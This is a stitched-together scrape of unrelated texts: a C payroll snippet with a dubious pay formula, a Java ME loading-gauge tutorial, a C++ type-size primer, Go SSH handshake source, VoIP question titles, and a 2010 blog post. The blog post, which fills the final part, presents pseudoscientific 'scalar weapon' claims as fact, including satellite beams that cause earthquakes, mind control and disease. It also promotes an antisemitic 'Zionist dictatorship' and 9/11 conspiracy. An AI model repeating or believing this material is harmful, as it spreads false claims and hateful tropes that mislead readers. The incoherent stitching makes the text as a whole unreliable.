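    printf("Enter %s's pay rate:\n", name);
    scanf("%f", &wage);                 /* plain %f: scanf takes no precision */

    pay = (wage * hrs) / tax_rate;
    printf("\n%s's pay is: $%.2f this pay period.\n", name, pay);

    return 0;
}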
How to create a custom gauge as loading screen with Java ME
This article describes how to create a custom Gauge as loading screen. The standard LCDUI Gauge provides an easy way to append a Gauge to a high level Form at the expense of having to go with a predefined look and animation. It is therefore worth investigating how to use low level UI components, such as a Canvas subclass in order to achieve a different look. In this example we demonstrate how to create a loading screen that looks like a loading bar.
Introduction
[Images: CustomGaugeStartScreen.png, CustomGaugeLoadingScreen.png]
This example consists of two main components
• 12 frames, which can be found in Media:GaugeLoaderSource.zip
• The logic to display the frames one after the other within a short period, so that the animation effect is achieved
Note: You will need to extract the 12 frames found in the zip file into the resource directory of your working project in order for this example to work properly.
Animation as a sequence of static images
In this example we used static images that we modified in Microsoft's Paint so that each frame has at least one spike that is entirely blank, while the two preceding spikes are painted in a lighter color than the others, which share the same solid grey color:
[Images: Frame1.png, Frame2.png, Frame3.png]
We used the bucket tool (Fill with Color) for this purpose.
The logic behind the animation
In the Canvas subclass, we load the frames as an array of Image instances from the resource directory of the working project. We have named our files consecutively frame1.png, frame2.png etc, so that it gets easier to instantiate the array within a for loop:
public CustomGauge() {
frames = new Image[12];
nextFrame = 0;
// The array of frames is filled up from the resource png files
for(int i = 0; i < 12; i++) {
try {
frames[i] = Image.createImage("/frame" + (i+1) + ".png");
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
//The thread moves from one frame to the next
thread = new Thread(this);
thread.start();
}
The animation is implemented within a thread, so that an integer variable keeps track of the active frame in a range from 0 to 11 (12 in total). If the active frame becomes the 11th, the frame that should follow is the one with index 0. Inside the thread we define the animation speed by setting the time for which the thread should sleep. A value of 70 milliseconds is used here. By modifying this value a faster or slower animation can be achieved:
public void run() {
while (true) {
try {
//start over if the last frame is active
if(nextFrame == 11) {
nextFrame = 0;
}
//otherwise increase frame number
else {
nextFrame++;
}
repaint();
//animation speed
Thread.sleep(70);
}
catch (InterruptedException e) {
break;
}
}
}
After setting the active frame, the repaint method draws the chosen image in the middle of the screen. Given that the images used in this example have dimensions of 133 x 135 pixels, in order to display them properly in the middle of the device's screen, we use the top left corner of the image as the anchor point and subtract half of the image's width and height from the screen's center in order to calculate the X and Y coordinates for placing the image's anchor point on the Canvas:
protected void paint(Graphics g) {
//draws the next frame at the center of screen. The images have width 133 and height 135 pixels
g.drawImage(frames[nextFrame], (getWidth() / 2) - 67, getHeight()/2 - 67, Graphics.TOP|Graphics.LEFT);
}
The MIDlet's code
import javax.microedition.lcdui.Command;
import javax.microedition.lcdui.CommandListener;
import javax.microedition.lcdui.Display;
import javax.microedition.lcdui.Displayable;
import javax.microedition.lcdui.Form;
import javax.microedition.midlet.MIDlet;
import javax.microedition.midlet.MIDletStateChangeException;
public class GaugeMIDlet
extends MIDlet
implements CommandListener {
Display display;
Command startCommand = new Command("Start", Command.OK, 0);
Command exitCommand = new Command("Exit",Command.BACK, 0);
Command backCommand = new Command("Back", Command.ITEM, 0);
CustomGauge customGauge; //the loading Gauge
Form mainForm; //the main control screen
public void commandAction(Command c, Displayable d) {
//exits the MIDlet
if(c == exitCommand){
notifyDestroyed();
}
//starts the custom loading Gauge
if(c == startCommand) {
display.setCurrent(customGauge);
}
//Interrupts the loading screen
if(c == backCommand) {
display.setCurrent(mainForm);
}
}
protected void startApp() throws MIDletStateChangeException {
display = Display.getDisplay(this);
//The main control screen's components
mainForm = new Form("Custom Gauge");
mainForm.append("Select start to initiate a process that takes some time to complete.");
mainForm.addCommand(startCommand);
mainForm.addCommand(exitCommand);
mainForm.setCommandListener(this);
display.setCurrent(mainForm);
//The loading Gauge's commands
customGauge = new CustomGauge();
customGauge.setTitle("Loading...");
customGauge.addCommand(exitCommand);
customGauge.addCommand(backCommand);
customGauge.setCommandListener(this);
}
protected void destroyApp(boolean arg0) throws MIDletStateChangeException {
//To do
}
protected void pauseApp() {
//To do
}
}
The Canvas subclass
import java.io.IOException;
import javax.microedition.lcdui.Canvas;
import javax.microedition.lcdui.Graphics;
import javax.microedition.lcdui.Image;
class CustomGauge
extends Canvas
implements Runnable {
Thread thread;
Image[] frames; //the array of frames
int nextFrame; //the running thread updates the next Frame
public CustomGauge() {
frames = new Image[12];
nextFrame = 0;
// The array of frames is filled up from the resource png files
for(int i = 0; i < 12; i++) {
try {
frames[i] = Image.createImage("/frame" + (i+1) + ".png");
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
//The thread moves from one frame to the next
thread = new Thread(this);
thread.start();
}
public void run() {
while (true) {
try {
//start over if the last frame is active
if(nextFrame == 11) {
nextFrame = 0;
}
//otherwise increase frame number
else {
nextFrame++;
}
repaint();
//animation speed
Thread.sleep(70);
}
catch (InterruptedException e) {
break;
}
}
}
protected void paint(Graphics g) {
//draws the next frame at the center of screen. The images have width 133 and height 135 pixels
g.drawImage(frames[nextFrame], (getWidth() / 2) - 67, getHeight()/2 - 67, Graphics.TOP|Graphics.LEFT);
}
}
Resources
The source code of this MIDlet is available for download from here: File:ShortedSearchSource.zip
The binary files of this MIDlet are available for download from here: File:ShortedSearchBinaries.zip
Article Metadata
• Code example tested with device(s): Nokia 303
• Compatibility: Platform(s): Series 40; Device(s): MIDP 2.0/CLDC 1.1
• Keywords: loading screen, loading bar, canvas, animation, frames
• Created: skalogir (12 Apr 2012); Reviewed: skalogir (12 Apr 2012); Last edited: skalogir (12 Apr 2012)
The C++ language defines a set of basic arithmetic types, which include integers, floating-point numbers, boolean values, and characters. The size of these types depends on the specific machine.
Let's write a simple program that uses the unary sizeof() operator, which returns the length in bytes of the variable or type placed in its parentheses.
#include <iostream>
int main()
{
    std::cout << "The int type has size: " << sizeof(int) << '\n'
        << "The short type has size: " << sizeof(short) << '\n'
        << "The long type has size: " << sizeof(long) << '\n'
        << "The char type has size: " << sizeof(char) << '\n'
        << "The single-precision float type has size: " << sizeof(float) << '\n'
        << "The double-precision double type has size: " << sizeof(double) << std::endl;
    return 0;
}
\n is the newline character. Here is the program's output using the C++ Shell compiler:
The int type has size: 4
The short type has size: 2
The long type has size: 8
The char type has size: 1
The single-precision float type has size: 4
The double-precision double type has size: 8
The bool type represents a logical (Boolean) data type and can take only one of two values: true and false.
Except for bool, the integer types come in signed and unsigned representations. A signed type can hold both negative and positive numbers (including zero), while an unsigned type can hold only non-negative numbers (zero included). In other words, if you know for certain that a variable's value cannot be negative, use an unsigned type. Such types are written as unsigned int, unsigned long, and so on.
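A small illustration of the difference: arithmetic on unsigned types is defined to wrap around modulo 2^N, and std::numeric_limits reports each type's range (the output shown assumes a platform with 32-bit int):

#include <iostream>
#include <limits>

int main()
{
    unsigned int u = 0;
    u = u - 1; // wraps around: modular arithmetic is defined for unsigned types
    std::cout << "unsigned 0 - 1 = " << u << '\n'; // 4294967295 with 32-bit int

    std::cout << "int max: " << std::numeric_limits<int>::max() << '\n';
    std::cout << "unsigned int max: "
              << std::numeric_limits<unsigned int>::max() << '\n';
    return 0;
}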
// Copyright 2013 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package ssh
import (
"crypto/rand"
"errors"
"fmt"
"io"
"log"
"net"
"sync"
)
// debugHandshake, if set, prints messages sent and received. Key
// exchange messages are printed as if DH were used, so the debug
// messages are wrong when using ECDH.
const debugHandshake = false
// chanSize sets the amount of buffering SSH connections. This is
// primarily for testing: setting chanSize=0 uncovers deadlocks more
// quickly.
const chanSize = 16
// keyingTransport is a packet based transport that supports key
// changes. It need not be thread-safe. It should pass through
// msgNewKeys in both directions.
type keyingTransport interface {
packetConn
// prepareKeyChange sets up a key change. The key change for a
// direction will be effected if a msgNewKeys message is sent
// or received.
prepareKeyChange(*algorithms, *kexResult) error
}
// handshakeTransport implements rekeying on top of a keyingTransport
// and offers a thread-safe writePacket() interface.
type handshakeTransport struct {
conn keyingTransport
config *Config
serverVersion []byte
clientVersion []byte
// hostKeys is non-empty if we are the server. In that case,
// it contains all host keys that can be used to sign the
// connection.
hostKeys []Signer
// hostKeyAlgorithms is non-empty if we are the client. In that case,
// we accept these key types from the server as host key.
hostKeyAlgorithms []string
// On read error, incoming is closed, and readError is set.
incoming chan []byte
readError error
mu sync.Mutex
writeError error
sentInitPacket []byte
sentInitMsg *kexInitMsg
pendingPackets [][]byte // Used when a key exchange is in progress.
// If the read loop wants to schedule a kex, it pings this
// channel, and the write loop will send out a kex
// message.
requestKex chan struct{}
// If the other side requests or confirms a kex, its kexInit
// packet is sent here for the write loop to find it.
startKex chan *pendingKex
// data for host key checking
hostKeyCallback HostKeyCallback
dialAddress string
remoteAddr net.Addr
// bannerCallback is non-empty if we are the client and it has been set in
// ClientConfig. In that case it is called during the user authentication
// dance to handle a custom server's message.
bannerCallback BannerCallback
// Algorithms agreed in the last key exchange.
algorithms *algorithms
readPacketsLeft uint32
readBytesLeft int64
writePacketsLeft uint32
writeBytesLeft int64
// The session ID or nil if first kex did not complete yet.
sessionID []byte
}
type pendingKex struct {
otherInit []byte
done chan error
}
func newHandshakeTransport(conn keyingTransport, config *Config, clientVersion, serverVersion []byte) *handshakeTransport {
t := &handshakeTransport{
conn: conn,
serverVersion: serverVersion,
clientVersion: clientVersion,
incoming: make(chan []byte, chanSize),
requestKex: make(chan struct{}, 1),
startKex: make(chan *pendingKex, 1),
config: config,
}
t.resetReadThresholds()
t.resetWriteThresholds()
// We always start with a mandatory key exchange.
t.requestKex <- struct{}{}
return t
}
func newClientTransport(conn keyingTransport, clientVersion, serverVersion []byte, config *ClientConfig, dialAddr string, addr net.Addr) *handshakeTransport {
t := newHandshakeTransport(conn, &config.Config, clientVersion, serverVersion)
t.dialAddress = dialAddr
t.remoteAddr = addr
t.hostKeyCallback = config.HostKeyCallback
t.bannerCallback = config.BannerCallback
if config.HostKeyAlgorithms != nil {
t.hostKeyAlgorithms = config.HostKeyAlgorithms
} else {
t.hostKeyAlgorithms = supportedHostKeyAlgos
}
go t.readLoop()
go t.kexLoop()
return t
}
func newServerTransport(conn keyingTransport, clientVersion, serverVersion []byte, config *ServerConfig) *handshakeTransport {
t := newHandshakeTransport(conn, &config.Config, clientVersion, serverVersion)
t.hostKeys = config.hostKeys
go t.readLoop()
go t.kexLoop()
return t
}
func (t *handshakeTransport) getSessionID() []byte {
return t.sessionID
}
// waitSession waits for the session to be established. This should be
// the first thing to call after instantiating handshakeTransport.
func (t *handshakeTransport) waitSession() error {
p, err := t.readPacket()
if err != nil {
return err
}
if p[0] != msgNewKeys {
return fmt.Errorf("ssh: first packet should be msgNewKeys")
}
return nil
}
func (t *handshakeTransport) id() string {
if len(t.hostKeys) > 0 {
return "server"
}
return "client"
}
func (t *handshakeTransport) printPacket(p []byte, write bool) {
action := "got"
if write {
action = "sent"
}
if p[0] == msgChannelData || p[0] == msgChannelExtendedData {
log.Printf("%s %s data (packet %d bytes)", t.id(), action, len(p))
} else {
msg, err := decode(p)
log.Printf("%s %s %T %v (%v)", t.id(), action, msg, msg, err)
}
}
func (t *handshakeTransport) readPacket() ([]byte, error) {
p, ok := <-t.incoming
if !ok {
return nil, t.readError
}
return p, nil
}
func (t *handshakeTransport) readLoop() {
first := true
for {
p, err := t.readOnePacket(first)
first = false
if err != nil {
t.readError = err
close(t.incoming)
break
}
if p[0] == msgIgnore || p[0] == msgDebug {
continue
}
t.incoming <- p
}
// Stop writers too.
t.recordWriteError(t.readError)
// Unblock the writer should it wait for this.
close(t.startKex)
// Don't close t.requestKex; it's also written to from writePacket.
}
func (t *handshakeTransport) pushPacket(p []byte) error {
if debugHandshake {
t.printPacket(p, true)
}
return t.conn.writePacket(p)
}
func (t *handshakeTransport) getWriteError() error {
t.mu.Lock()
defer t.mu.Unlock()
return t.writeError
}
func (t *handshakeTransport) recordWriteError(err error) {
t.mu.Lock()
defer t.mu.Unlock()
if t.writeError == nil && err != nil {
t.writeError = err
}
}
func (t *handshakeTransport) requestKeyExchange() {
select {
case t.requestKex <- struct{}{}:
default:
// something already requested a kex, so do nothing.
}
}
func (t *handshakeTransport) resetWriteThresholds() {
t.writePacketsLeft = packetRekeyThreshold
if t.config.RekeyThreshold > 0 {
t.writeBytesLeft = int64(t.config.RekeyThreshold)
} else if t.algorithms != nil {
t.writeBytesLeft = t.algorithms.w.rekeyBytes()
} else {
t.writeBytesLeft = 1 << 30
}
}
func (t *handshakeTransport) kexLoop() {
write:
for t.getWriteError() == nil {
var request *pendingKex
var sent bool
for request == nil || !sent {
var ok bool
select {
case request, ok = <-t.startKex:
if !ok {
break write
}
case <-t.requestKex:
break
}
if !sent {
if err := t.sendKexInit(); err != nil {
t.recordWriteError(err)
break
}
sent = true
}
}
if err := t.getWriteError(); err != nil {
if request != nil {
request.done <- err
}
break
}
// We're not servicing t.requestKex, but that is OK:
// we never block on sending to t.requestKex.
// We're not servicing t.startKex, but the remote end
// has just sent us a kexInitMsg, so it can't send
// another key change request, until we close the done
// channel on the pendingKex request.
err := t.enterKeyExchange(request.otherInit)
t.mu.Lock()
t.writeError = err
t.sentInitPacket = nil
t.sentInitMsg = nil
t.resetWriteThresholds()
// we have completed the key exchange. Since the
// reader is still blocked, it is safe to clear out
// the requestKex channel. This avoids the situation
// where: 1) we consumed our own request for the
// initial kex, and 2) the kex from the remote side
// caused another send on the requestKex channel,
clear:
for {
select {
case <-t.requestKex:
//
default:
break clear
}
}
request.done <- t.writeError
// kex finished. Push packets that we received while
// the kex was in progress. Don't look at t.startKex
// and don't increment writtenSinceKex: if we trigger
// another kex while we are still busy with the last
// one, things will become very confusing.
for _, p := range t.pendingPackets {
t.writeError = t.pushPacket(p)
if t.writeError != nil {
break
}
}
t.pendingPackets = t.pendingPackets[:0]
t.mu.Unlock()
}
// drain startKex channel. We don't service t.requestKex
// because nobody does blocking sends there.
go func() {
for init := range t.startKex {
init.done <- t.writeError
}
}()
// Unblock reader.
t.conn.Close()
}
// The protocol uses uint32 for packet counters, so we can't let them
// reach 1<<32. We will actually read and write more packets than
// this, though: the other side may send more packets, and after we
// hit this limit on writing we will send a few more packets for the
// key exchange itself.
const packetRekeyThreshold = (1 << 31)
func (t *handshakeTransport) resetReadThresholds() {
t.readPacketsLeft = packetRekeyThreshold
if t.config.RekeyThreshold > 0 {
t.readBytesLeft = int64(t.config.RekeyThreshold)
} else if t.algorithms != nil {
t.readBytesLeft = t.algorithms.r.rekeyBytes()
} else {
t.readBytesLeft = 1 << 30
}
}
func (t *handshakeTransport) readOnePacket(first bool) ([]byte, error) {
p, err := t.conn.readPacket()
if err != nil {
return nil, err
}
if t.readPacketsLeft > 0 {
t.readPacketsLeft--
} else {
t.requestKeyExchange()
}
if t.readBytesLeft > 0 {
t.readBytesLeft -= int64(len(p))
} else {
t.requestKeyExchange()
}
if debugHandshake {
t.printPacket(p, false)
}
if first && p[0] != msgKexInit {
return nil, fmt.Errorf("ssh: first packet should be msgKexInit")
}
if p[0] != msgKexInit {
return p, nil
}
firstKex := t.sessionID == nil
kex := pendingKex{
done: make(chan error, 1),
otherInit: p,
}
t.startKex <- &kex
err = <-kex.done
if debugHandshake {
log.Printf("%s exited key exchange (first %v), err %v", t.id(), firstKex, err)
}
if err != nil {
return nil, err
}
t.resetReadThresholds()
// By default, a key exchange is hidden from higher layers by
// translating it into msgIgnore.
successPacket := []byte{msgIgnore}
if firstKex {
// sendKexInit() for the first kex waits for
// msgNewKeys so the authentication process is
// guaranteed to happen over an encrypted transport.
successPacket = []byte{msgNewKeys}
}
return successPacket, nil
}
// sendKexInit sends a key change message.
func (t *handshakeTransport) sendKexInit() error {
t.mu.Lock()
defer t.mu.Unlock()
if t.sentInitMsg != nil {
// kexInits may be sent either in response to the other side,
// or because our side wants to initiate a key change, so we
// may have already sent a kexInit. In that case, don't send a
// second kexInit.
return nil
}
msg := &kexInitMsg{
KexAlgos: t.config.KeyExchanges,
CiphersClientServer: t.config.Ciphers,
CiphersServerClient: t.config.Ciphers,
MACsClientServer: t.config.MACs,
MACsServerClient: t.config.MACs,
CompressionClientServer: supportedCompressions,
CompressionServerClient: supportedCompressions,
}
io.ReadFull(rand.Reader, msg.Cookie[:])
if len(t.hostKeys) > 0 {
for _, k := range t.hostKeys {
msg.ServerHostKeyAlgos = append(
msg.ServerHostKeyAlgos, k.PublicKey().Type())
}
} else {
msg.ServerHostKeyAlgos = t.hostKeyAlgorithms
}
packet := Marshal(msg)
// writePacket destroys the contents, so save a copy.
packetCopy := make([]byte, len(packet))
copy(packetCopy, packet)
if err := t.pushPacket(packetCopy); err != nil {
return err
}
t.sentInitMsg = msg
t.sentInitPacket = packet
return nil
}
func (t *handshakeTransport) writePacket(p []byte) error {
switch p[0] {
case msgKexInit:
return errors.New("ssh: only handshakeTransport can send kexInit")
case msgNewKeys:
return errors.New("ssh: only handshakeTransport can send newKeys")
}
t.mu.Lock()
defer t.mu.Unlock()
if t.writeError != nil {
return t.writeError
}
if t.sentInitMsg != nil {
// Copy the packet so the writer can reuse the buffer.
cp := make([]byte, len(p))
copy(cp, p)
t.pendingPackets = append(t.pendingPackets, cp)
return nil
}
if t.writeBytesLeft > 0 {
t.writeBytesLeft -= int64(len(p))
} else {
t.requestKeyExchange()
}
if t.writePacketsLeft > 0 {
t.writePacketsLeft--
} else {
t.requestKeyExchange()
}
if err := t.pushPacket(p); err != nil {
t.writeError = err
}
return nil
}
func (t *handshakeTransport) Close() error {
return t.conn.Close()
}
func (t *handshakeTransport) enterKeyExchange(otherInitPacket []byte) error {
if debugHandshake {
log.Printf("%s entered key exchange", t.id())
}
otherInit := &kexInitMsg{}
if err := Unmarshal(otherInitPacket, otherInit); err != nil {
return err
}
magics := handshakeMagics{
clientVersion: t.clientVersion,
serverVersion: t.serverVersion,
clientKexInit: otherInitPacket,
serverKexInit: t.sentInitPacket,
}
clientInit := otherInit
serverInit := t.sentInitMsg
if len(t.hostKeys) == 0 {
clientInit, serverInit = serverInit, clientInit
magics.clientKexInit = t.sentInitPacket
magics.serverKexInit = otherInitPacket
}
var err error
t.algorithms, err = findAgreedAlgorithms(clientInit, serverInit)
if err != nil {
return err
}
// We don't send FirstKexFollows, but we handle receiving it.
//
// RFC 4253 section 7 defines the kex and the agreement method for
// first_kex_packet_follows. It states that the guessed packet
// should be ignored if the "kex algorithm and/or the host
// key algorithm is guessed wrong (server and client have
// different preferred algorithm), or if any of the other
// algorithms cannot be agreed upon". The other algorithms have
// already been checked above so the kex algorithm and host key
// algorithm are checked here.
if otherInit.FirstKexFollows && (clientInit.KexAlgos[0] != serverInit.KexAlgos[0] || clientInit.ServerHostKeyAlgos[0] != serverInit.ServerHostKeyAlgos[0]) {
// other side sent a kex message for the wrong algorithm,
// which we have to ignore.
if _, err := t.conn.readPacket(); err != nil {
return err
}
}
kex, ok := kexAlgoMap[t.algorithms.kex]
if !ok {
return fmt.Errorf("ssh: unexpected key exchange algorithm %v", t.algorithms.kex)
}
var result *kexResult
if len(t.hostKeys) > 0 {
result, err = t.server(kex, t.algorithms, &magics)
} else {
result, err = t.client(kex, t.algorithms, &magics)
}
if err != nil {
return err
}
if t.sessionID == nil {
t.sessionID = result.H
}
result.SessionID = t.sessionID
if err := t.conn.prepareKeyChange(t.algorithms, result); err != nil {
return err
}
if err = t.conn.writePacket([]byte{msgNewKeys}); err != nil {
return err
}
if packet, err := t.conn.readPacket(); err != nil {
return err
} else if packet[0] != msgNewKeys {
return unexpectedMessageError(msgNewKeys, packet[0])
}
return nil
}
func (t *handshakeTransport) server(kex kexAlgorithm, algs *algorithms, magics *handshakeMagics) (*kexResult, error) {
var hostKey Signer
for _, k := range t.hostKeys {
if algs.hostKey == k.PublicKey().Type() {
hostKey = k
}
}
r, err := kex.Server(t.conn, t.config.Rand, magics, hostKey)
return r, err
}
func (t *handshakeTransport) client(kex kexAlgorithm, algs *algorithms, magics *handshakeMagics) (*kexResult, error) {
result, err := kex.Client(t.conn, t.config.Rand, magics)
if err != nil {
return nil, err
}
hostKey, err := ParsePublicKey(result.HostKey)
if err != nil {
return nil, err
}
if err := verifyHostKeySignature(hostKey, result); err != nil {
return nil, err
}
err = t.hostKeyCallback(t.dialAddress, t.remoteAddr, hostKey)
if err != nil {
return nil, err
}
return result, nil
}
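For context, a minimal client that exercises this handshake code via the package's public API might look like the following; the host, user, and password are placeholders, and InsecureIgnoreHostKey is for demonstration only (a real client should verify host keys):

package main

import (
	"log"

	"golang.org/x/crypto/ssh"
)

func main() {
	// ClientConfig.HostKeyCallback feeds the hostKeyCallback field used in
	// handshakeTransport.client() above; the key exchange and rekeying are
	// driven by the code in this file.
	config := &ssh.ClientConfig{
		User:            "demo",
		Auth:            []ssh.AuthMethod{ssh.Password("password")},
		HostKeyCallback: ssh.InsecureIgnoreHostKey(), // do not use in production
	}
	client, err := ssh.Dial("tcp", "example.com:22", config)
	if err != nil {
		log.Fatal(err)
	}
	defer client.Close()
	log.Println("handshake complete, session ID established")
}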
What software has the features I need to replace Skype? (12 votes, 4 answers, 699 views)
For the past few years Skype has been getting progressively worse with each iteration. Skype 5 moved away from the compact 2.X era interface to an interface that's much more wasteful and less usable. ...

Can I use 2 iPhones as walkie talkie? (without internet!) (7 votes, 2 answers, 22k views)
I want to use 2 (or more) iPhones as walkie talkie (i.e. they talk to each other without needing internet/voice call). Of course this should work with wifi, because it doesn't make much sense to have ...

What's the best iPhone SIP apps work internationally and allow recording? (7 votes, 7 answers, 49k views)
So far, Siphon is the best SIP app I've tried. MobileVOIP and TruPhone are very nice too (and don't need jailbreaking). Other apps offer at least some SIP features such as Nimbuzz, Fring, Viber and ...

What SIP voip client for OS X I could use? (3 votes, 2 answers, 2k views)
I'm looking for a, preferably free, SIP client for OS X, one that will allow multiple SIP accounts and preferably supports the g729 audio codec.

Can volume automatically decrease during communication activity? (3 votes, 1 answer, 425 views)
A feature of Windows 7 that I really like is that it can decrease the volume of system sounds/music by 50%/80%/mute entirely when it senses communication activity, i.e. a Skype call, Google Voice call, etc. ...

What iOS apps allow free calling to the UK? (3 votes, 7 answers, 9k views)
I travel a lot, so often rely on WiFi for calling. On the iPhone, I use MagicJack to get completely free calls over WiFi/VoIP to US numbers. I'm looking for a similar app to enable me to call UK ...

Caller ID spoofing or change caller ID? (2 votes, 4 answers, 14k views)
Is there a subscription site or iPhone application for changing caller ID or caller ID spoofing? In other words I want to call someone, but I want to change my number (for example 000000 or 111111). ...

iPhone voip services allowed? (2 votes, 1 answer, 140 views)
Do Apple and either AT&T or Verizon currently allow VoIP services to be used? Essentially, would a user be able to have phone service by using just a data plan?

How to unmask the SIP credentials in the Zoiper VoIP application? (1 vote, 2 answers, 2k views)
Is it possible to unmask the SIP credentials stored in the Preferences of the Zoiper VoIP application? I couldn't find any password unmask application for that and I can't find the password in my ...

Using iPhone on VoIP landline? (1 vote, 1 answer, 215 views)
At my home I have a bundled internet connection and a VoIP landline. These services are provided with a Huawei HG659 Wi-Fi modem. Is there a way I can connect my iPhone to my VoIP landline via Wi-Fi? ...

Floating, transparent Mute Status for Call Center use? (1 vote, 0 answers, 25 views)
We have a call center with agents taking calls with Bria. Due to limitations of the setup, Auto-Answer is the most convenient way of having calls connected. However, this creates a problem that agents ...

Not able to log into the LINE VOIP service using a MacBook Air via wifi at home (1 vote, 0 answers, 76 views)
I have a MacBook Air with Core i5 and it is connected to the web through a Netgear wifi router at home. I am able to connect to the web without any problems but I am just not able to log into LINE using ...

Is there an alternative Ventrilo client for OS X? (1 vote, 0 answers, 348 views)
Are there any decent software packages for OS X that can connect to Vent servers? The Ventrilo for Mac client isn't up to much.

Mavericks based VOIP solution needed (0 votes, 1 answer, 92 views)
I am traveling and, as usual, I brought my Vonage box. It blew. So I have a Vonage account and no means to connect to it. Any ideas? The Vonage App - SoftPhone stopped with 10.4! Vonage Companion ...

Can't hear or be heard when I call from my iPhone 5 (0 votes, 0 answers, 44 views)
I cannot hear or be heard when I make a call on my iPhone. But when I use a VOIP application like Viber or Skype it works just fine and I can call and hear. My SIM card works just fine on other phones. ...

Can I play audio from computer through VOIP connection? (0 votes, 1 answer, 73 views)
I'm using join.me for online presentations. If I have a video I'd like to share, I can't send the sound to join.me. I was thinking perhaps some Soundflower setup might enable this function. Any ideas ...
Saturday, January 09, 2010
Further Research Into Scalar Weaponry Deployed Via Satellite, And Some Interesting Hypotheses Regarding Its Use In The Post 9-11 Global Dictatorship
This author read the following article several years ago, and the existence of much of the technology discussed in the article is certainly plausible. In the late 19th Century, inventor Nikola Tesla was working on the type of scalar technology which government scientist Tom Bearden was later credited with inventing. However, on the day after Tesla's death, the FBI raided Tesla's apartment and confiscated all of his notes (that is, those which were not destroyed in an earlier, deliberately set fire in his Manhattan laboratory). The fire was said to have been started by oil magnate John D. Rockefeller, after Tesla refused to sell his research to Rockefeller. Since that time the U.S. Military Intelligence complex has had access to this technology, and more than half a century in which to develop it for the Zionist one world dictatorship agenda.
After more than half a decade of reading about this technology (as well as being remotely targeted by DEW weaponry), I can say with absolute certainty that one of myriad aspects of this global Zionist dictatorship has been to make the public as ignorant as possible. And moreover, to create smokescreens in the way of disinformation and brainless entertainment in order to ensure that the public remains in a state of ignorance regarding this technology.
Such ignorance must be propagated so that these citizens are unable to challenge this immense conspiratorial attack on their freedom. And in order to stay gainfully employed in the United States one must remain ignorant and unwilling to challenge its criminal status quo, or risk being blacklisted while their lives are systematically destroyed. The best examples of this in the modern day can be found in our elected officials as well as those employed by the mainstream media, since these people simply refuse to acknowledge that the attacks on 9-11-2001 were perpetrated by a cabal within the U.S. Military Industrial Intelligence complex, or that these attacks were perpetrated in order to allow the Bush Administration (under PNAC leadership) a plausible reason to wage war on Afghanistan and Iraq - wars which were used to give the Zionist international bankers total control over the Middle East, while seizing the oil and natural gas reserves from Iraq, and ensuring that the Unocal Corporation would be given the right to build the TransAfghanistan oil pipeline across Northern Afghanistan. Something which would never have happened if the United States had not attacked Afghanistan, while nullifying the contract between the Taliban and Argentina to build this pipeline.
Those who are no longer ignorant of the following technology, or of the fact that it is being used to create a global police state (backed up by advanced scalar weapons with capabilities far beyond the traditional weapons of war), are being demonized, tortured and murdered by way of these weapons, while our elected officials (for their own safety) refuse to intercede. Not that they would have any chance of doing so any longer, since they would find themselves targeted for the destruction of their careers, have their lives threatened, and be made into the pariahs that those of us being used for non consensual human experimentation have already been made into.
The war which is presently being waged against the global middle class is one in which the mind of the citizen is being attacked. Once the citizen's mind has been neutralized they will become as powerless as the individual heads of cattle which are slaughtered for human consumption - exactly what the Zionist/Illuminati intend to attain for their global dictatorship.
If you live the life of a target of such mind control experimentation long enough, you learn to understand that supporting the Zionist one world government (wittingly or unwittingly) is far more dangerous than death itself. Especially in realizing that by speaking up you do what you can to alert the people of this planet to what is happening to them. Or failing to do so and becoming part of this nefarious plot in which to destroy humanity.
12 Things You Should Know About Scalar Weapons
by Christi Verismo
BRACE YOURSELF FOR SCALAR WEAPON WAR THAT COULD OCCUR
http://www.angelfire.com/oz/cv/scalarweapons.html
1. A possible scalar war scenario
2. How were scalar waves discovered?
3. A closer look at scalar wave-forms
4. How do scalar weapons work?
5. What can scalar weapons do?
6. Scalar beams against individuals
7. Scalar mind control
8. America's 'no contact' mass mind controlling network
9. Inducing diseases with scalar waves
10. Tesla's technology was secretly continued by Russia and the Nazis
11. Is there a secret war going on in the skies?
12. Who else is continuing Tesla's scalar technology?
1. A POSSIBLE SCALAR WAR SCENARIO
The following seems like science fiction, but scalar beam weapons were invented in 1904 by an American immigrant genius from Yugoslavia called Nikola Tesla (1856 or 1857-1943).
Since he died in 1943, many nations have secretly developed his beam weapons which, now further refined, are so powerful that just by satellite one can:
Cause nuclear-like destruction;
Trigger an earthquake;
Whip up a hurricane;
Raise a tidal wave;
Cause instant freezing, killing every living thing instantly over many miles;
Cause intense heat like a burning fireball over a wide area;
Induce hypnotic mind control over a whole population, or even read anyone on the planet's mind by remote;
Affect anybody's REM dream sleep by sending in subliminal pictures to the visual cortex;
Cause hallucinogenic, drug-like effects or the symptoms of chemical or biological poisoning;
Create a disease epidemic by imprinting the disease 'signature' right into the cellular structure;
Paralyze and/or kill everyone instantaneously in a 50-mile radius; and lastly
Remove something right out of its place in time and space faster than the speed of light, without any detectable warning, by crossing 2 or more beams with each other; any target can be aimed at, even right through to the opposite side of the earth.
If either of the major scalar weapon armed countries, e.g. the U.S. or Russia, were to fire a nuclear missile at the other, it might well never reach its target, because the missile could be destroyed with scalar technology before it even left its place of origin. Radio traffic revealing that it was about to be fired could be eavesdropped on, and the missile could be destroyed in its bunker, fired at from space by satellite.
Alternatively, invisible moving barriers and globes made of plasma (produced by crossed scalar beams) could easily destroy any nuclear missile as it moves towards the target; failing all these, it could be destroyed on entering the target's territory by passing through a Tesla shield, which would explode anything entering its airspace.
To begin with, a defense using scalar technology could intercept the missile before it even landed. Secret eavesdropping on radio communications, tapping into ordinary military radio contact using undetectable 'scalar wave carriers', may already have picked up military personnel saying it was about to be fired. The missile might then be destroyed from above the site, using satellites equipped with scalar or particle beam weapons, a cloaked UFO (an American or Russian made anti-gravity disk, originally made by back-engineering crashed alien saucers), or aircraft using scalar or particle beams, which could invisibly (and, with standard equipment, undetectably) cause the target to malfunction and drop down.
By using a scalar wave (radar-like) 'interference grid', which covers both countries' entire military activities in the air, underground or undersea, scalar transmitters send waves over large areas at 90-degree angles to each other. These waves follow the earth-ionospheric wave guide and curve around the planet.
It is called an 'interference grid' because all solid moving objects show up as a spot of light moving through marked grid squares on an operator's video screen. Scalar waves are a higher form of radar waves, but they go one step further by passing through anything solid as well, and can be focused into a beam to detect and target anything through the earth or sea.
